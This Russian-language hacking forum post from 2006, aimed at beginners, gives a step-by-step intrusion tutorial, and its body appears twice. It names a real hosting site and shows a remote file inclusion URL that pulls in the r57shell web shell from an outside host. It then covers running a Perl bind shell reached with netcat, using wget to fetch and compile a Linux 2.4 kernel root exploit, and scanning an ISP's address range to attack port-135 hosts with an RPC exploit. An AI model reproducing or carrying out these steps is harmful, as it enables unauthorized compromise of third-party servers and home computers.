D1mOn
05.03.2006, 15:00
Сразу оговорюсь эта статья исключительно для новичков, и для тех кто с этим никогда раньше не сталкивался!
Всё скрипты и программы искользуемые в статье качаем отсюда:
http://d1m0n.jino-net.ru/root.rar
В этой статье я расскажу как можно получить рута на сервере с уязвимым ядром Linux 2.4.21, а так же как через этот сервер можно проникнуть на удалённый компьютер через 135 порт. Итак начнём.
Действие первое:
Получаем рута на сервере.
Я нашёл хостинг _http://i2dhost.com с распространённой уязвимостью. Воспользуемся этой уязвимостью:
i2dhost.com/hostadmin/?path=http://rst.void.ru/download/r57shell.txt?
Тээкс мы зашли в шелл. Изменим рабочую дерикторию на /tmp. Сделали ? Идём далее. Теперь нам надо открыть порт чтобы законектиться к серверу через прогу netcat. Воспользуемя бинд шеллом который откроет нам 32762 порт. Заливаем бинд шелл со своего компьютера (это легко делается при помощи r57shell). Так бинд шелл залили, теперь надо его запустить командой:
perl bind_port.pl Сделали. Теперь запускаем программу netcat и вписываем туда i2dhost.com 32762. Набираем ls -la, и вот перед нами список файлов в директории /tmp. Следующим шагом будет заливка и компиляция скрипта который и даст нам рута.
В netcat набираем wget http://packetstormsecurity.org/0312-exploits/hatorihanzo.c Ждём пару секунд. Всё загрузилось? Теперь компилируем командой:
gcc -o hatorihanzo hatorihanzo.c -static Скомпилировали. Теперь запускаем командой ./hatorihanzo Теперь набираем команду id и видим uid=0|root| gid=0|root| Все теперь на сервере у нас права root.
Действие второе:
Проникаем на удалённый компьютер.
Сначала ище компьютеры с открытым 135 портом. Я это делал при помощи XSpider'a. Вбиваем диапазон ip адресов своего прова у меня это 82.179.80.1 - 82.179.82.255. Запускаем сканер. И он ищет все компы, и показывает их открытые порты. У меня он из 40 компов нашёл 17 с открытым 135 портом. Далее заливаем скрипт expl.c на порутаный нами сервак. Компилируем его командой gcc -o expl expl.c
Теперь запускаем командой: ./expl Ну а там уже разобраться не трудно)
Так же оговорюсь что для выполнения второго действия права root не обязательны.
Ну вот и всё. Спасибо за внимание.
Всё скрипты и программы искользуемые в статье качаем отсюда:
http://d1m0n.jino-net.ru/root.rar
В этой статье я расскажу как можно получить рута на сервере с уязвимым ядром Linux 2.4.21, а так же как через этот сервер можно проникнуть на удалённый компьютер через 135 порт. Итак начнём.
Действие первое:
Получаем рута на сервере.
Я нашёл хостинг _http://i2dhost.com с распространённой уязвимостью. Воспользуемся этой уязвимостью:
i2dhost.com/hostadmin/?path=http://rst.void.ru/download/r57shell.txt?
Тээкс мы зашли в шелл. Изменим рабочую дерикторию на /tmp. Сделали ? Идём далее. Теперь нам надо открыть порт чтобы законектиться к серверу через прогу netcat. Воспользуемя бинд шеллом который откроет нам 32762 порт. Заливаем бинд шелл со своего компьютера (это легко делается при помощи r57shell). Так бинд шелл залили, теперь надо его запустить командой:
perl bind_port.pl Сделали. Теперь запускаем программу netcat и вписываем туда i2dhost.com 32762. Набираем ls -la, и вот перед нами список файлов в директории /tmp. Следующим шагом будет заливка и компиляция скрипта который и даст нам рута.
В netcat набираем wget http://packetstormsecurity.org/0312-exploits/hatorihanzo.c Ждём пару секунд. Всё загрузилось? Теперь компилируем командой:
gcc -o hatorihanzo hatorihanzo.c -static Скомпилировали. Теперь запускаем командой ./hatorihanzo Теперь набираем команду id и видим uid=0|root| gid=0|root| Все теперь на сервере у нас права root.
Действие второе:
Проникаем на удалённый компьютер.
Сначала ище компьютеры с открытым 135 портом. Я это делал при помощи XSpider'a. Вбиваем диапазон ip адресов своего прова у меня это 82.179.80.1 - 82.179.82.255. Запускаем сканер. И он ищет все компы, и показывает их открытые порты. У меня он из 40 компов нашёл 17 с открытым 135 портом. Далее заливаем скрипт expl.c на порутаный нами сервак. Компилируем его командой gcc -o expl expl.c
Теперь запускаем командой: ./expl Ну а там уже разобраться не трудно)
Так же оговорюсь что для выполнения второго действия права root не обязательны.
Ну вот и всё. Спасибо за внимание.